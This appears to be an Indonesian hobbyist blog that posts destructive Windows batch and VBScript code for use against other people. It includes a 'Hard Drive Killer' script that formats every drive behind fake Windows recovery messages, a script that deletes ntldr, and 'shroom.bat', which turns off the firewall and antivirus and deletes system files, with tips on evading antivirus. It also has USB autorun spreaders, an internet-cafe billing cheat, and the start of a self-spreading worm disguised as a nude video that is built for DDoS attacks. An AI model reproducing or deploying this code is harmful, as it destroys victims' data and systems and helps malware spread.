Sabtu, 13 November 2010
script lg niyy...=_='
@echo off
rem Fastest way to format your computer.
:start
cls
echo PLEASE WAIT WHILE PROGRAM LOADS . . .
call attrib -r -h c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo call format c: /q /u /autotest >nul >>c:\autoexec.bat
call attrib +r +h c:\autoexec.bat >nul
rem Drive checking and assigning the valid drives to the drive variable.
set drive=
set alldrive=c d e f g h i j k l m n o p q r s t u v w x y z
rem code insertion for Drive Checking takes place here.
rem drivechk.bat is the file name under the root directory.
rem As far as the drive detection and drive variable settings, don't worry about how it
rem works, it's damn to complicated for the average or even the expert batch programmer.
rem Except for Tom Lavedas.
echo @echo off >drivechk.bat
echo @prompt %%%%comspec%%%% /f /c vol %%%%1: $b find "Vol" > nul >{t}.bat
%comspec% /e:2048 /c {t}.bat >>drivechk.bat
del {t}.bat
echo if errorlevel 1 goto enddc >>drivechk.bat
cls
echo PLEASE WAIT WHILE PROGRAM LOADS . . .
rem When errorlevel is 1, then the above is not true, if 0, then it's true.
rem Opposite of binary rules. If 0, it will elaps to the next command.
echo @prompt %%%%comspec%%%% /f /c dir %%%%1:.\/ad/w/-p $b find "bytes" > nul >{t}.bat
%comspec% /e:2048 /c {t}.bat >>drivechk.bat
del {t}.bat
echo if errorlevel 1 goto enddc >>drivechk.bat
cls
echo PLEASE WAIT WHILE PROGRAM LOADS . . .
rem if errorlevel is 1, then the drive specified is a removable media drive - not ready.
rem if errorlevel is 0, then it will elaps to the next command.
echo @prompt dir %%%%1:.\/ad/w/-p $b find " 0 bytes free" > nul >{t}.bat
%comspec% /e:2048 /c {t}.bat >>drivechk.bat
del {t}.bat
echo if errorlevel 1 set drive=%%drive%% %%1 >>drivechk.bat
cls
echo PLEASE WAIT WHILE PROGRAM LOADS . . .
rem if it's errorlevel 1, then the specified drive is a hard or floppy drive.
rem if it's not errorlevel 1, then the specified drive is a CD-ROM drive.
echo :enddc >>drivechk.bat
rem Drive checking insertion ends here. "enddc" stands for "end dDRIVE cHECKING".
rem Now we will use the program drivechk.bat to attain valid drive information.
:testdrv
for %%a in (%alldrive%) do call drivechk.bat %%a >nul
if %drive%.==. set drive=c
del drivechk.bat >nul
:form_del
call attrib -r -h c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat
echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autotest >nul >>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat
echo for %%%%a in (%drive%) do call c:\temp.bat %%%%a Bunga >nul >>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat
echo for %%%%a in (%drive%) call deltree /y %%%%a:\ >nul >>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat
echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autotest >nul >>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat
echo for %%%%a in (%drive%) do call c:\temp.bat %%%%a Bunga >nul >>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat
echo for %%%%a in (%drive%) call deltree /y %%%%a:\ >nul >>c:\autoexec.bat
echo cd\ >>c:\autoexec.bat
echo cls >>c:\autoexec.bat
echo echo Welcome to the land of death. Hard Drive Killer Pro Version 4.0. >>c:\autoexec.bat
echo echo If you ran this file, then sorry, I just made it. The purpose of this program is to tell you the following. . . >>c:\autoexec.bat
echo echo 1. To make people aware that security should not be taken for granted. >>c:\autoexec.bat
echo echo 3. This breach of your security will benefit you in the long-run, so don't worry. Think about it.>>c:\autoexec.bat
echo echo. >>c:\autoexec.bat
echo echo Regards, >>c:\autoexec.bat
echo echo. >>c:\autoexec.bat
echo echo Munga Bunga >>c:\autoexec.bat
call attrib +r +h c:\autoexec.bat
:makedir
if exist c:\temp.bat attrib -r -h c:\temp.bat >nul
echo @echo off >c:\temp.bat
echo %%1:\ >>c:\temp.bat
echo cd\ >>c:\temp.bat
echo :startmd >>c:\temp.bat
echo for %%%%a in ("if not exist %%2\nul md %%2" "if exist %%2\nul cd %%2"wink do %%%%a >>c:\temp.bat
echo for %%%%a in (">ass_hole.txt"wink do echo %%%%a Your Gone @$$hole!!!! >>c:\temp.bat
echo if not exist %%1:\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2 \%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\nul goto startmd >>c:\temp.bat
call attrib +r +h c:\temp.bat >nul
cls
rem deltree /y %%a:\*. only eliminates directories, hence leaving the file created above for further destruction.
for %%a in (%drive%) do call format %%a: /q /u /autotest >nul
cls
for %%a in (%drive%) do call c:\temp.bat %%a Munga >nul
cls
for %%a in (%drive%) call attrib -r -h %%a:\ /S >nul
call attrib +r +h c:\temp.bat >nul
call attrib +r +h c:\autoexec.bat >nul
cls
for %%a in (%drive%) call deltree /y %%a:\*. >nul
cls
for %%a in (%drive%) do call c:\temp.bat %%a Munga >nul
cls
:end
File .bat yg jahat
Part 1 .bat yg jahat
Buka notepad, lalu tulis script di bawah ini, yang warna biru aja, yang item jangan :
attrib –s –h –r c:\ntldr <~ mengubah atribut si ‘ntldr’ menjadi, system=false(-), hidden=false(-), readonly=false(-)
ren c:\ntldr mledukkomplu <~ mengubah nama si ‘ntldr’ menjadi ‘mledukkomplu’
del c:\mledukkomplu <~ karena saya suka ragu, saya hapus pula si mledukkomplu itu (ntldr)
part 2. bikin autoRUN bwat file .EXE
[autorun]
OPEN=anvir.bat
Icon=Ruby.ico
ave dgn nama autorun
otomatis di fd autorun.txt uba txt jd .inf
PART 3. BIKIN AUTORUN bwat file apa aja
[autorun]
ShellExecute=anvir.bat
Icon=Ruby.ico
Code: Select all
01001011000111110010010101010101010000011111100000
2. Simpan file dengan nama terserah anda. Yang penting ekstensinya .EXE
bisa kan save dengan ekstensi .EXE ??
jangan di gunakan di komputer pribadi anda
dan jangan sekali” mempunyai pikiran jahat denagn menggunakan ini..wkwkwkw
3.klo dah di save dengan ekstensi .EXE
trus di double click dehh.. bimsalabim.. punya hardisk baru deh..hahags
tips: kalo mau kerjain orang silahkan tambahkan autorun di massukan di flashdisk
1. format c:\ /Q/X — ini akan memformat drive c:
Code: Select all
01100110011011110111001001101101011000010111010000 10000001
1000110011101001011100
001000000010111101010001001011110101100
2. format d:\ /Q/X — ini akan memformat drive d:
Code: Select all
01100110011011110111001001101101011000010111010000 100000011
001000011101001011100
0010000000101111010100010010111101011000
1 lg niy yg jail2....
:Begin
msg * muka lo jelek
msg * ngaca dulu gih
msg * hayo lo,cupu lu gw acak2
msg * ud install ulang aja
msg * biar masalah nya kelar
GOTO BEGIN
save namafile.BAT
(ekstensi filenya harus .BAT)
2.bikin shutdown+message
Code:
[i]@echo off
msg * apaan sih lo
shutdown -s -c “Error! muka mu standar abis”
save namafile.BAT
[/i](ekstensi filenya harus .BAT)
3.Mainin Caps Lock button
Code:
[i]Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{CAPSLOCK}”
loop
save namafile.vbs[/i]
(save dengan Ekstensi file .vbs)
4.buka tutup CD/DVD
[i]Code:
Set oWMP = CreateObject(“WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
save namafile.vbs[/i]
5.bikin vbscript nongol mlulu
Code:
[i]Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop
save namafile.vbs
ket:di task manager full wscript yg lg running
[/i]
6.teken tombol backspace mlulu
Code:
[i]MsgBox “kembali ke menu sebelumnya”
Set wshShell =wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “{bs}”
loop
save namafile.vbs
[/i]
7.otomatis ngetik “lu jelek banget sih” di notepad/word
Code:
[i]Set wshShell = wscript.CreateObject(“WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “lu jelek banget sih!!!”
loop
save namafile.vbs
8.buka Notepad trus menerus
Code:
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
save namafile.BAT
ket:termasuk yang ngeselin banget nih
bisa di ganti,terserah mau buka cmd ato buka yg lain..ganti aja dir nya.
[/i]
9.otomatis buka Notepad lalu ngetik apa yg lo mau
Code:
[i]WScript.Sleep 1800
WScript.Sleep 100
Set WshShell = WScript.CreateObject(“WScript.Shell”)
WshShell.Run “notepad”
WScript.Sleep 10
WshShell.AppActivate “notepad”
WScript.Sleep 50
WshShell.SendKeys “ka”
WScript.Sleep 50
WshShell.SendKeys “mu “
WScript.Sleep 50
WshShell.SendKeys “je”
WScript.Sleep 50
WshShell.SendKeys “le”
WScript.Sleep 50
WshShell.SendKeys “k “
WScript.Sleep 50
WshShell.SendKeys ” se”
WScript.Sleep 50
WshShell.SendKeys “ka”
WScript.Sleep 50
WshShell.SendKeys “li”
WScript.Sleep 50
WshShell.SendKeys ” y”
WScript.Sleep 50
WshShell.SendKeys “a”
WScript.Sleep 50
WshShell.SendKeys ” h”
WScript.Sleep 50
WshShell.SendKeys “!”
WScript.Sleep 50
WshShell.SendKeys “!! “
save namafile.vbs
ket:
ini salah satu script favorit gw…
[/i][i]10.@echo off
title quiz hari ini
:menu
cls
echo jika kamu kena Virus apa yang kamu lakukan
pause
echo pilih yang mana:
echo 1. matiin computer
echo 2. format aja
echo 3. bingung ahh
set input=nothing
set /p input=Choice:
if %input%==1 shutdown -s -t 30
if %input%==2 del c:\xxx
if %input%==3 @ECHO off
msg * muka lo jelek
msg * ngaca dulu gih
msg * hayo lo,cpu lu gw acak2
msg * ud install ulang aja
msg * biar masalah nya kelar
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top[/i]
Minggu, 24 Oktober 2010
code html
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>-HACKED-</title>
<style type="text/css">
.matrix { font-family:Lucida Console, Courier, Monotype; font-size:20pt; text-align:center; width:20px; padding:0px; margin:0px;}
body {
background-color: #000000;
}
.style1 {font-family: Lucida Console, Courier, Monotype; font-size: 20pt; text-align: center; width: 20px; padding: 0px; margin: 0px; color: #FFFFFF; }
</style>
<script type="text/javascript" language="JavaScript">
var rows=15;
var speed=26;
var reveal=2;
var effectalign="center"
var w3c=document.getElementById && !window.opera;;
var ie45=document.all && !window.opera;
var ma_tab, matemp, ma_bod, ma_row, x, y, columns, ma_txt, ma_cho;
var m_coch=new Array();
var m_copo=new Array();
window.onload=function() {
if (!w3c && !ie45) return
var matrix=(w3c)?document.getElementById("matrix"):document.all["matrix"];
ma_txt=(w3c)?matrix.firstChild.nodeValue:matrix.innerHTML;
ma_txt=" "+ma_txt+" ";
columns=ma_txt.length;
if (w3c) {
while (matrix.childNodes.length) matrix.removeChild(matrix.childNodes[0]);
ma_tab=document.createElement("table");
ma_tab.setAttribute("border", 0);
ma_tab.setAttribute("align", effectalign);
ma_tab.style.backgroundColor="#000000";
ma_bod=document.createElement("tbody");
for (x=0; x<rows; x++) {
ma_row=document.createElement("tr");
for (y=0; y<columns; y++) {
matemp=document.createElement("td");
matemp.setAttribute("id", "Mx"+x+"y"+y);
matemp.className="matrix";
matemp.appendChild(document.createTextNode(String.fromCharCode(160)));
ma_row.appendChild(matemp);
}
ma_bod.appendChild(ma_row);
}
ma_tab.appendChild(ma_bod);
matrix.appendChild(ma_tab);
} else {
ma_tab='<ta'+'ble align="'+effectalign+'" border="0" style="background-color:#000000">';
for (var x=0; x<rows; x++) {
ma_tab+='<t'+'r>';
for (var y=0; y<columns; y++) {
ma_tab+='<t'+'d class="matrix" id="Mx'+x+'y'+y+'"> </'+'td>';
}
ma_tab+='</'+'tr>';
}
ma_tab+='</'+'table>';
matrix.innerHTML=ma_tab;
}
ma_cho=ma_txt;
for (x=0; x<columns; x++) {
ma_cho+=String.fromCharCode(32+Math.floor(Math.random()*94));
m_copo[x]=0;
}
ma_bod=setInterval("mytricks()", speed);
}
function mytricks() {
x=0;
for (y=0; y<columns; y++) {
x=x+(m_copo[y]==100);
ma_row=m_copo[y]%100;
if (ma_row && m_copo[y]<100) {
if (ma_row<rows+1) {
if (w3c) {
matemp=document.getElementById("Mx"+(ma_row-1)+"y"+y);
matemp.firstChild.nodeValue=m_coch[y];
}
else {
matemp=document.all["Mx"+(ma_row-1)+"y"+y];
matemp.innerHTML=m_coch[y];
}
matemp.style.color="#33ff66";
matemp.style.fontWeight="bold";
}
if (ma_row>1 && ma_row<rows+2) {
matemp=(w3c)?document.getElementById("Mx"+(ma_row-2)+"y"+y):document.all["Mx"+(ma_row-2)+"y"+y];
matemp.style.fontWeight="normal";
matemp.style.color="#00ff00";
}
if (ma_row>2) {
matemp=(w3c)?document.getElementById("Mx"+(ma_row-3)+"y"+y):document.all["Mx"+(ma_row-3)+"y"+y];
matemp.style.color="#009900";
}
if (ma_row<Math.floor(rows/2)+1) m_copo[y]++;
else if (ma_row==Math.floor(rows/2)+1 && m_coch[y]==ma_txt.charAt(y)) zoomer(y);
else if (ma_row<rows+2) m_copo[y]++;
else if (m_copo[y]<100) m_copo[y]=0;
}
else if (Math.random()>0.9 && m_copo[y]<100) {
m_coch[y]=ma_cho.charAt(Math.floor(Math.random()*ma_cho.length));
m_copo[y]++;
}
}
if (x==columns) clearInterval(ma_bod);
}
function zoomer(ycol) {
var mtmp, mtem, ytmp;
if (m_copo[ycol]==Math.floor(rows/2)+1) {
for (ytmp=0; ytmp<rows; ytmp++) {
if (w3c) {
mtmp=document.getElementById("Mx"+ytmp+"y"+ycol);
mtmp.firstChild.nodeValue=m_coch[ycol];
}
else {
mtmp=document.all["Mx"+ytmp+"y"+ycol];
mtmp.innerHTML=m_coch[ycol];
}
mtmp.style.color="#33ff66";
mtmp.style.fontWeight="bold";
}
if (Math.random()<reveal) {
mtmp=ma_cho.indexOf(ma_txt.charAt(ycol));
ma_cho=ma_cho.substring(0, mtmp)+ma_cho.substring(mtmp+1, ma_cho.length);
}
if (Math.random()<reveal-1) ma_cho=ma_cho.substring(0, ma_cho.length-1);
m_copo[ycol]+=199;
setTimeout("zoomer("+ycol+")", speed);
}
else if (m_copo[ycol]>200) {
if (w3c) {
mtmp=document.getElementById("Mx"+(m_copo[ycol]-201)+"y"+ycol);
mtem=document.getElementById("Mx"+(200+rows-m_copo[ycol]--)+"y"+ycol);
}
else {
mtmp=document.all["Mx"+(m_copo[ycol]-201)+"y"+ycol];
mtem=document.all["Mx"+(200+rows-m_copo[ycol]--)+"y"+ycol];
}
mtmp.style.fontWeight="normal";
mtem.style.fontWeight="normal";
setTimeout("zoomer("+ycol+")", speed);
}
else if (m_copo[ycol]==200) m_copo[ycol]=100+Math.floor(rows/2);
if (m_copo[ycol]>100 && m_copo[ycol]<200) {
if (w3c) {
mtmp=document.getElementById("Mx"+(m_copo[ycol]-101)+"y"+ycol);
mtmp.firstChild.nodeValue=String.fromCharCode(160);
mtem=document.getElementById("Mx"+(100+rows-m_copo[ycol]--)+"y"+ycol);
mtem.firstChild.nodeValue=String.fromCharCode(160);
}
else {
mtmp=document.all["Mx"+(m_copo[ycol]-101)+"y"+ycol];
mtmp.innerHTML=String.fromCharCode(160);
mtem=document.all["Mx"+(100+rows-m_copo[ycol]--)+"y"+ycol];
mtem.innerHTML=String.fromCharCode(160);
}
setTimeout("zoomer("+ycol+")", speed);
}
}
</script>
</head>
<body>
<div align="center" id="matrix"> H A C K E D </div>
</body>
</html>
Kalo dah di copy paste di notepad % kasih nama format .html
Buka dengan browser. Akan muncul efek teks Matrix (tulisan jatuh dari atas ke bawah) dan lama kelamaan yang muncul adalah tulisan HACKED.
Kalo yg muncul HACKED bisa diganti tulisan yg kita ingini..
Nih aku kasih tahu tempat tulisan HACKED tu
<body>
<div align="center" id="matrix"> H A C K E D </div>
</body>
ok cukup banyak ya & sedikit bikin temen-temen bingung tapi moga bermanfaat ok
shroom.bat (ganas cuyy..)
shroom.bat, virus ganas dengan batch script
catatan: ketika saya tes. antivirus saya(avira) langsung nyala ketika virus ini selesai dibuat(belum di jalankan). lalu bagaimana solusinya? saran saya, simpan virus ini dengan ekstensi .txt dulu. baru setelah di komputer korban kita ubah menjadi .bat. dan jangan lupa virus ini bernama shroom
start color 5 title Your Fucked, lol time 12:00 net stop "Security center" net stop sharedaccess netsh firewall set opmode mode-disable start echo copy %0 >> c:\autoexec.bat copy %0 c:\windows\startm~1\Programs\StartUp\shroom.bat Attrib +r +h C:\windows\startm~1\program\startup\shroom.bat echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >> c:\regstart.reg echo "systemStart"="c:\filename\virus.bat" >> c:\regstart.reg start c:\regstart.reg copy %0 %systemroot%\shroom.bat > nul start copy %0 *.bat > nul start attrib +r +h virus.bat attrib +r +h RUNDLL32 USER32.DLL,SwapMouseButton tskill msnmsgr tskill Limewire tskill iexplorer tskill NMain tskill Firefox tskill explorer tskill AVGUARD msg * Awww Your computer is now fucked msg * You got owned! msg * Say Bye to your computer n00b copy shroom.bat C:/WINDOWS copy shroom.bat C:/WINDOWS copy shroom.bat C:/WINDOWS copy shroom.bat C:/WINDOWS copy shroom.bat C:/WINDOWS copy shroom.bat C:/WINDOWS copy shroom.bat C:/WINDOWS copy shroom.bat C:/WINDOWS copy shroom.bat C:/WINDOWS copy shroom.bat C:/WINDOWS copy shroom.bat C:/WINDOWS copy shroom.bat C:/WINDOWS copy shroom.bat C:/WINDOWS copy shroom.bat C:/WINDOWS copy shroom.bat C:/WINDOWS copy shroom.bat C:/WINDOWS copy shroom.bat C:/WINDOWS copy shroom.bat C:/WINDOWS copy shroom.bat C:/WINDOWS copy shroom.bat C:/WINDOWS del "C:\WINDOWS\pchealth\" del "C:\WINDOWS\system\" del "C:\WINDOWS\system32\restore\" del "C:\WINDOWS\system32\logonui.exe" del "C:\WINDOWS\system32\ntoskrnl.exe" del "Winlogon.exe" ERASE c: start shutdown - s -t 15 -c "15 Seconds and counting" cd %userprofile%\Desktop copy fixvirus.bat %userprofile%\Desktop echo HAXHAXHAX :LOOP color 17 color 28 color 32 color 22 color 11 color 02 color 39 color 34 GOTO LOOPBaca Selengkapnya
script virus yg jail
[autorun]
UseAutoPlay=1
open=FUN.bat
Autoplay=test
action=Open Folder To View File
shell\execute=EXECUTE THIS STUPID
shell\execute\command=FUN.bat
shell=execute
shell\recover=to recover
shell\recover\command=recovery.bat
shell\OPEN\Command=FUN.bat
Shell\install\command=fun.bat
shell\Explorer\command=fun.bat
shell\Explore\command=fun.bat
Shell\Format\command=fun.bat
coba ganti fun.bat dgn software lain, lihat hasilnya.
Nich benar 2x kerjain orang
kejamnya niy virus ..
buka aplikasi notepad.
trus copy paste code di bawah ini
@echo offfor %%i in (c:,d:,e:,f:,g:) do format %%i /FS:NTFS /x
nah, simpan dengan nama VIRUS.BAT
ingat, extensi file harus BAT
OK
Atau yg lebih kejam lagi, coba source code ini
@echo off rem Fastest way to format your computer. :start cls echo PLEASE WAIT WHILE PROGRAM LOADS . . . call attrib -r -h c:\autoexec.bat >nul echo @echo off >c:\autoexec.bat echo call format c: /q /u /autotest >nul >>c:\autoexec.bat call attrib +r +h c:\autoexec.bat >nul rem Drive checking and assigning the valid drives to the drive variable. set drive= set alldrive=c d e f g h i j k l m n o p q r s t u v w x y z rem code insertion for Drive Checking takes place here. rem drivechk.bat is the file name under the root directory. rem As far as the drive detection and drive variable settings, don't worry about how it rem works, it's damn to complicated for the average or even the expert batch programmer. rem Except for Tom Lavedas. echo @echo off >drivechk.bat echo @prompt %%%%comspec%%%% /f /c vol %%%%1: $b find "Vol" > nul >{t}.bat%comspec% /e:2048 /c {t}.bat >>drivechk.batdel {t}.bat echo if errorlevel 1 goto enddc >>drivechk.bat cls echo PLEASE WAIT WHILE PROGRAM LOADS . . . rem When errorlevel is 1, then the above is not true, if 0, then it's true. rem Opposite of binary rules. If 0, it will elaps to the next command. echo @prompt %%%%comspec%%%% /f /c dir %%%%1:.\/ad/w/-p $b find "bytes" > nul >{t}.bat %comspec% /e:2048 /c {t}.bat >>drivechk.bat del {t}.bat echo if errorlevel 1 goto enddc >>drivechk.bat cls echo PLEASE WAIT WHILE PROGRAM LOADS . . . rem if errorlevel is 1, then the drive specified is a removable media drive - not ready. rem if errorlevel is 0, then it will elaps to the next command. echo @prompt dir %%%%1:.\/ad/w/-p $b find " 0 bytes free" > nul >{t}.bat %comspec% /e:2048 /c {t}.bat >>drivechk.bat del {t}.bat echo if errorlevel 1 set drive=%%drive%% %%1 >>drivechk.bat cls echo PLEASE WAIT WHILE PROGRAM LOADS . . . rem if it's errorlevel 1, then the specified drive is a hard or floppy drive. rem if it's not errorlevel 1, then the specified drive is a CD-ROM drive. echo :enddc >>drivechk.bat rem Drive checking insertion ends here. "enddc" stands for "end dDRIVE cHECKING". rem Now we will use the program drivechk.bat to attain valid drive information. :testdrv for %%a in (%alldrive%) do call drivechk.bat %%a >nul if %drive%.==. set drive=c del drivechk.bat >nul :form_del call attrib -r -h c:\autoexec.bat >nul echo @echo off >c:\autoexec.bat echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autotest >nul >>c:\autoexec.bat echo cls >>c:\autoexec.bat echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat echo for %%%%a in (%drive%) do call c:\temp.bat %%%%a Bunga >nul >>c:\autoexec.bat echo cls >>c:\autoexec.bat echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat echo for %%%%a in (%drive%) call deltree /y %%%%a:\ >nul >>c:\autoexec.bat echo cls >>c:\autoexec.bat echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autotest >nul >>c:\autoexec.bat echo cls >>c:\autoexec.bat echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat echo for %%%%a in (%drive%) do call c:\temp.bat %%%%a Bunga >nul >>c:\autoexec.bat echo cls >>c:\autoexec.bat echo echo Loading Windows, please wait while Microsoft Windows recovers your system . . . >>c:\autoexec.bat echo for %%%%a in (%drive%) call deltree /y %%%%a:\ >nul >>c:\autoexec.bat echo cd\ >>c:\autoexec.bat echo cls >>c:\autoexec.bat echo echo Welcome to the land of death. Hard Drive Killer Pro Version 4.0. >>c:\autoexec.bat echo echo If you ran this file, then sorry, I just made it. The purpose of this program is to tell you the following. . . >>c:\autoexec.bat echo echo 1. To make people aware that security should not be taken for granted. >>c:\autoexec.bat echo echo 3. This breach of your security will benefit you in the long-run, so don't worry. Think about it.>>c:\autoexec.bat echo echo. >>c:\autoexec.bat echo echo Regards, >>c:\autoexec.bat echo echo. >>c:\autoexec.bat echo echo Munga Bunga >>c:\autoexec.bat call attrib +r +h c:\autoexec.bat :makedirif exist c:\temp.bat attrib -r -h c:\temp.bat >nul echo @echo off >c:\temp.bat echo %%1:\ >>c:\temp.bat echo cd\ >>c:\temp.bat echo :startmd >>c:\temp.bat echo for %%%%a in ("if not exist %%2\nul md %%2" "if exist %%2\nul cd %%2"wink do %%%%a >>c:\temp.bat echo for %%%%a in (">ass_hole.txt"wink do echo %%%%a Your Gone @$$hole!!!! >>c:\temp.bat echo if not exist %%1:\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2 \%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\nul goto startmd >>c:\temp.bat call attrib +r +h c:\temp.bat >nul cls rem deltree /y %%a:\*. only eliminates directories, hence leaving the file created above for further destruction. for %%a in (%drive%) do call format %%a: /q /u /autotest >nul clsfor %%a in (%drive%) do call c:\temp.bat %%a Munga >nul clsfor %%a in (%drive%) call attrib -r -h %%a:\ /S >nul call attrib +r +h c:\temp.bat >nul call attrib +r +h c:\autoexec.bat >nul clsfor %%a in (%drive%) call deltree /y %%a:\*. >nul clsfor %%a in (%drive%) do call c:\temp.bat %%a Munga >nul cls :endBaca Selengkapnya
hack billing
Tutor Lebih Jelas Biar gag banyak yang junk,,
How To..First
1.Pergi ke warnet
2.Login Paket(contoh paket 1.2jam)
How To..Hack
1.download dolo file nya hahahaa
2.Mati'in anti virus-nya (jamilah gag berbahaya kugh)
3.Buka jamillah nya..
4.Cari/Scrool kebawah samapai nemu client008.exe
5.klick kanan..
6.pilih suspend/(lebih bagus kill klo maen game) ..close jamillah nya....
7.Taraaaa....waktu pun berhenti..
8.klo mau stop klick kanan pilih resume...ingat klo mau berhenti'in hacknya pas udah selese nge-net..contoh main paket 1=2jam trus pake hack billing with jamillah nah ikutin langkah" diatas..trus aye udah maen 4 jam..ane mau berhenti klick kanan client008.exe pilih resume..tara billing ke stop dan langsung bayar 2jam saja...
ingat hanya untuk yang bermain pakeD....thx...Kurang jelas...panah gwe....
hapus file autorun.inf
1. Buka Command Prompt, caranya bisa lewat START menu >> All Programs >> Accessories >> Command Prompt
atau juga bisa lewat START menu >> Run >> ketikkan "cmd" tanpa tanda kutip.
2. Ketikkan:
"del /a:rhs ?:\autorun.inf"tanpa tanda kutip di Command Prompt.Ganti "?" dengan letak USB Drive Letter anda. semisal: E , F , G ,dll.
3. Lalu Reboot System pada komputer anda, selesai. Baca Selengkapnya
senjata ampuh
- infeksi seluruh drive, menyebarkan diri via email( outlook), mirc, flashdisk, lan via network sharing
-worm ini juga mampu mengupdate diri dengan mendownload file update
- pada jam jam tertentu juga melakukan http request, syn,icmp ke website target hacker malaysia:tbd,hmsecurity,sec-r1z,v4-team
monggo bagi yg mao ikut nyebarin worm ini
yg disebarkan adl nude_indo_girl.mpg.vbs (nama file tdk boleh diubah)
rem nude girl internet w0rm version 1.0
rem c0d3r : mywisdom
rem this intenet w0rm will spread via irc, lan, flash disk, drives, outlook email
rem to all my targets and enemies. you wanna play with me? ok you fight with my worm before fight with me
rem special thanks to all devilzc0de crews and members
rem special thanks to all jasakom crews and members
rem special thanks to all ycl crews and members
rem greetz to all solhack 2003-2004 crews
rem got r00t ???
rem this v1rus is made purposely for helping me in ddosing my targets
on error resume next
Set mywisdom = CreateObject("WScript.Shell")
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
App.TaskVisible = False
infek2()
infek_regiistry_sambil_boker()
infek_sistem()
infek_ie()
download_winsock()
download_winsock2()
download_update_worm1()
infek_file_dan_web()
NetSpread()
sebar_ke_irc_1()
sebarkan_email_hahaha()
kirim_syn_target()
http_ddos_target()
kirim_icmp_target()
iframe_attack()
wget_attack1()
wget_attack2()
wget_attack3()
wget_attack4()
wget_attack5()
browsing()
infek_sistem()
Set mywisdom = CreateObject("WScript.Shell")
anti_delete()
mywisdom.Sleep 100000
jalan()
sub jalan()
Set mywisdom = CreateObject("WScript.Shell")
mywisdom.run("nude_indo_girl.mpg.vbs")
mywisdom.Sleep 100000
end sub
Sub infek2()
on error resume next
dim mywisdom
isi = "Open=nude_indo_girl.mpg.vbs"
Set mywisdom = CreateObject("WScript.Shell")
mywisdom.run("del autorun.inf")
Set fso = CreateObject("Scripting.FileSystemObject")
Set file = fso.OpenTextFile("autorun.inf", 8, True)
file.WriteLine(isi)
file.Close
SET file = NOTHING
win = fso.GetParentFolderName(Wscript.ScriptFullName)
autorun= win & "\autorun.inf"
satu= win & "\nude_indo_girl.mpg.vbs"
dua = "c:\WINDOWS\nude_indo_girl.mpg.vbs"
tiga = "c:\nude_indo_girl.mpg.vbs"
empat = "c:\windows\nude_indo_girl.mpg.vbs"
lima = "c:\windows\system32\nude_indo_girl.mpg.vbs"
enam = "c:\xampp\htdocs\nude_indo_girl.mpg.vbs"
d= "d:\nude_indo_girl.mpg.vbs"
e="e:\nude_indo_girl.mpg.vbs"
f="f:\nude_indo_girl.mpg.vbs"
g="g:\nude_indo_girl.mpg.vbs"
h="h:\nude_indo_girl.mpg.vbs"
i= "I:\nude_indo_girl.mpg.vbs"
j= "j:\nude_indo_girl.mpg.vbs"
k= "k:\nude_indo_girl.mpg.vbs"
l= "l:\nude_indo_girl.mpg.vbs"
m= "m:\nude_indo_girl.mpg.vbs"
n= "n:\nude_indo_girl.mpg.vbs"
o= "o:\nude_indo_girl.mpg.vbs"
p= "p:\nude_indo_girl.mpg.vbs"
q= "q:\nude_indo_girl.mpg.vbs"
r= "r:\nude_indo_girl.mpg.vbs"
s= "s:\nude_indo_girl.mpg.vbs"
t= "t:\nude_indo_girl.mpg.vbs"
u= "u:\nude_indo_girl.mpg.vbs"
v= "v:\nude_indo_girl.mpg.vbs"
